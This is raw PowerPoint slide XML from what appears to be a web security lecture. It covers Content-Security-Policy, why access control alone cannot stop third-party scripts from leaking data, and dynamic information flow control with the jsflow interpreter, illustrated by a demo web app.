          </a:p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" name="Rektangel med rundade hörn 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820386" y="5406514"/>
            <a:ext cx="7521776" cy="32272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1600" dirty="0"/>
              <a:t>Content-Security-Policy: default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: ‘self’; script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: ‘self’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>static.domain.tld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Bildobjekt 5" descr="CSP_Shield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177" y="1719071"/>
            <a:ext cx="1268865" cy="1331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0684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84682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Many of the protection mechanism are instances of access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inclusion, sandboxing, CSP …</a:t>
            </a:r>
          </a:p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Problems with access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scripts need access!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does not protect after access has been granted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requires (frequently misplaced) trust in code that is granted access</a:t>
            </a:r>
          </a:p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Consider the following questions. Is it ok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for an online retailer to divulge your payment information?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for an online retailer to divulge your purchase history?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for Google to gather all information Google Analytics has access to?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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jQuery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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modernizr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, … to gather any information at all?</a:t>
            </a:r>
          </a:p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CONCLUSION: access control is not enough!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941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Bildobjekt 42" descr="cloud-icon-png-cloud-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759" y="2201405"/>
            <a:ext cx="3106856" cy="3106856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Web app? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Bildobjekt 6" descr="p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68" y="3736172"/>
            <a:ext cx="816159" cy="8161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7" name="Rak pil 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493305" y="4144252"/>
            <a:ext cx="133455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ruta 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3634827" y="3924152"/>
            <a:ext cx="1697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Simplicity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Bildobjekt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7598" y="3235959"/>
            <a:ext cx="1000426" cy="10004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6" name="Bildobjekt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6914" y="4526592"/>
            <a:ext cx="771186" cy="771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7" name="Bildobjekt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0150" y="2063758"/>
            <a:ext cx="1308100" cy="1308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9" name="Bildobjekt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9200" y="2013976"/>
            <a:ext cx="863600" cy="863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0" name="Bildobjekt 4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76460" y="4787561"/>
            <a:ext cx="685800" cy="68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" name="Bildobjekt 50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753" b="98545" l="1200" r="97900">
                        <a14:foregroundMark x1="62300" y1="33269" x2="62300" y2="33269"/>
                        <a14:foregroundMark x1="47200" y1="28031" x2="47200" y2="28031"/>
                        <a14:foregroundMark x1="14300" y1="33948" x2="14300" y2="339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34510" y="5651161"/>
            <a:ext cx="617290" cy="636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3" name="Bildobjekt 5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04200" y="5941020"/>
            <a:ext cx="939800" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="textruta 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640927" y="3626962"/>
            <a:ext cx="983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SaaS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Bildobjekt 5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75887" y="3626962"/>
            <a:ext cx="812800" cy="81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510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Suggested solution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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flow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>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783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80999" y="1624280"/>
            <a:ext cx="8407893" cy="513893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Information flow control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Define policies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is allowed to flow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> what the program does with the information, i.e., how the information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> during computation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disallow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> flows that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>violate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the policy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In terms of security classification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e.g., the classic Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret &gt; Secret &gt; Classified &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unclassified</a:t>
            </a:r>
          </a:p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Classify information sources – associates security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level with information read from the source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the value of the password field is labeled ‘password’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1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Classify information sinks – set the maximum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classification of information that is allowed to flow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to the sink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POST to https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acme.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/login labeled ‘password’,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meaning that it is ok to send (via POST) passwords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to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acme.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/login over https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flow control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Höger klammerparentes 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7760544" y="3279707"/>
            <a:ext cx="230919" cy="321014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ruta 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8090429" y="4698907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636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64505" y="1727317"/>
            <a:ext cx="8407893" cy="487222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All sources and sinks must be labeled	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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>he only flows allowed are those explicitly allowed by the policy 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All other flows violate the policy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w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hen detected execution is stopped with a security error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Enforcement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Static or dynamic? Compile time or run time?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JavaScript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dynamic types – highly dynamic language - hard to handle statically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1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Dynamic information flow control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Values carry their classification as runtime labels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Labels are updated during execution to capture flow of information and checked against security policy to detect and stop violations</a:t>
            </a:r>
          </a:p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flow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597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ktangel med rundade hörn 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750217" y="1572122"/>
            <a:ext cx="5562600" cy="44873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Rak 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840677" y="3789617"/>
            <a:ext cx="4672556" cy="9686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Rak 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137943" y="4531410"/>
            <a:ext cx="2776024" cy="20048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IFC example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="imgres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813" y="2891521"/>
            <a:ext cx="800354" cy="80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Bildobjekt 15" descr="imgr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943" y="3789617"/>
            <a:ext cx="741793" cy="741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Bildobjekt 4" descr="j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400" y="3457493"/>
            <a:ext cx="664247" cy="664247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Rak pil 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2787307" y="4582137"/>
            <a:ext cx="350636" cy="67953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Rak pil 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378131" y="4655964"/>
            <a:ext cx="0" cy="49661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Frihandsfigur 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777524" y="3284859"/>
            <a:ext cx="903613" cy="472194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 903613 w 903613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 472194"/>
              <a:gd name="connsiteX1" fmla="*/ 276782 w 903613"/>
              <a:gd name="connsiteY1" fmla="*/ 162826 h 472194"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 903613"/>
              <a:gd name="connsiteY2" fmla="*/ 472194 h 47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3613" h="472194">
                <a:moveTo>
                  <a:pt x="903613" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="665498" y="42063"/>
                  <a:pt x="427384" y="84127"/>
                  <a:pt x="276782" y="162826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126180" y="241525"/>
                  <a:pt x="0" y="472194"/>
                  <a:pt x="0" y="472194"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Rak pil 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018640" y="3026779"/>
            <a:ext cx="1133312" cy="97858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2" name="Bildobjekt 21" descr="imgres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136" y="2330233"/>
            <a:ext cx="800354" cy="80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Bildobjekt 17" descr="jQurery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8" y="2428839"/>
            <a:ext cx="462682" cy="462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Bildobjekt 18" descr="modernizr-sticker.jpg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3667" r="963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36" t="18638" r="4562" b="17732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809538" y="2428839"/>
            <a:ext cx="664624" cy="462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textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333875" y="2048783"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="textruta 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599230" y="3624139"/>
            <a:ext cx="1224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acme.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="textruta 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512788" y="255909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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="textruta 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872937" y="534112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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Bildobjekt 29" descr="Screen Shot 2015-08-04 at 12.40.43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487" y="4655964"/>
            <a:ext cx="2948375" cy="2133692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Bildobjekt 32" descr="images.jpg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889" b="89778" l="0" r="100000">
                        <a14:foregroundMark x1="61333" y1="40000" x2="61333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234" y="3286322"/>
            <a:ext cx="853661" cy="853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Bildobjekt 33" descr="Cloud-Hosting-4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234" y="2188586"/>
            <a:ext cx="831354" cy="831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6" name="Rak pil 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5506167" y="2726854"/>
            <a:ext cx="1232490" cy="29308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Rak pil 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506167" y="3214674"/>
            <a:ext cx="1232490" cy="47036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Frihandsfigur 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227589" y="3304409"/>
            <a:ext cx="4982086" cy="1060652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4982086"/>
              <a:gd name="connsiteY0" fmla="*/ 927277 h 1060652"/>
              <a:gd name="connsiteX1" fmla="*/ 1188537 w 4982086"/>
              <a:gd name="connsiteY1" fmla="*/ 984266 h 1060652"/>
              <a:gd name="connsiteX2" fmla="*/ 2841092 w 4982086"/>
              <a:gd name="connsiteY2" fmla="*/ 15455 h 1060652"/>
              <a:gd name="connsiteX3" fmla="*/ 4982086 w 4982086"/>
              <a:gd name="connsiteY3" fmla="*/ 479507 h 1060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82086" h="1060652">
                <a:moveTo>
                  <a:pt x="0" y="927277"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="357511" y="1031756"/>
                  <a:pt x="715022" y="1136236"/>
                  <a:pt x="1188537" y="984266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1662052" y="832296"/>
                  <a:pt x="2208834" y="99581"/>
                  <a:pt x="2841092" y="15455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3473350" y="-68672"/>
                  <a:pt x="4227718" y="205417"/>
                  <a:pt x="4982086" y="479507"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Bildobjekt 41" descr="1366511188978779390free-red-cloud-advertising-md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730" y="5258150"/>
            <a:ext cx="676048" cy="676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Bildobjekt 42" descr="search.png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489" y="3927514"/>
            <a:ext cx="504000" cy="50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Bildobjekt 28" descr="analytics-icon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867" y="5261671"/>
            <a:ext cx="672527" cy="672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textruta 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018640" y="1532448"/>
            <a:ext cx="5114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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>acme.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>login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79423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900" dirty="0" smtClean="0"/>
              <a:t>Information flow control with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>jsflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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security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040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74364" y="1839348"/>
            <a:ext cx="8229600" cy="4700131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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a security-enhanced JavaScript interpreter for fine-grained tracking of information flow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full support for non-strict ECMA-262 v.5 including the standard API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provides dynamic (runtime) tracking and verification of security labels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is written in JavaScript, which enables flexibility in the deployment of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow</a:t>
            </a:r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See http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for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source code, related articles, an online version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow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and a challenge!</a:t>
            </a:r>
          </a:p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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can be used in Firefox via the experimental Tortoise plugin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replaces the built-in JavaScript engine and brings the security of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the web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brings information flow control to the web!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JSFlow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112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Screen Shot 2015-08-06 at 15.20.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1" y="1485658"/>
            <a:ext cx="7162800" cy="5594692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rundad rektangulär 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177841" y="1190104"/>
            <a:ext cx="1504792" cy="1183052"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43377"/>
              <a:gd name="adj2" fmla="val 94230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Ads via mock up ad-server (injection)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rundad rektangulär 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="211989" y="5079570"/>
            <a:ext cx="1504792" cy="1183052"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37548"/>
              <a:gd name="adj2" fmla="val -94740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Login requires password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(secret)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rundad rektangulär 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2841426" y="5484829"/>
            <a:ext cx="1832173" cy="1183052"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52048"/>
              <a:gd name="adj2" fmla="val -94740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Mock up analytics with click tracking (injection)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rubrik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Meet the raven</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rundad rektangulär 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7257468" y="4952570"/>
            <a:ext cx="1504792" cy="1183052"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37548"/>
              <a:gd name="adj2" fmla="val -94740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 created content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137317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Rak 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5853900" y="1855692"/>
            <a:ext cx="0" cy="461912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Hrafn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt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927" y="2895244"/>
            <a:ext cx="615462" cy="679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Bildobjekt 3" descr="imgres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338" y="2774020"/>
            <a:ext cx="800354" cy="80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Bildobjekt 19" descr="1366511188978779390free-red-cloud-advertising-m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628" y="4555330"/>
            <a:ext cx="676048" cy="676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Bildobjekt 20" descr="analytics-icon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536" y="4555330"/>
            <a:ext cx="672527" cy="672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3" name="Rak pil 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3352255" y="3154205"/>
            <a:ext cx="9431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Rak pil 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2801328" y="3744715"/>
            <a:ext cx="9337" cy="67953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Rak pil 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3196888" y="3476880"/>
            <a:ext cx="967752" cy="94736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Rak pil 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5261692" y="2637579"/>
            <a:ext cx="1144010" cy="357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Rak pil 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161972" y="3437989"/>
            <a:ext cx="860882" cy="5847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Rak pil 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583746" y="2569503"/>
            <a:ext cx="860882" cy="4259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Rak pil 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1583746" y="3263049"/>
            <a:ext cx="860882" cy="2686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Höger 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5988935" y="6027174"/>
            <a:ext cx="2455642" cy="58113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not in demo</a:t>
            </a:r>
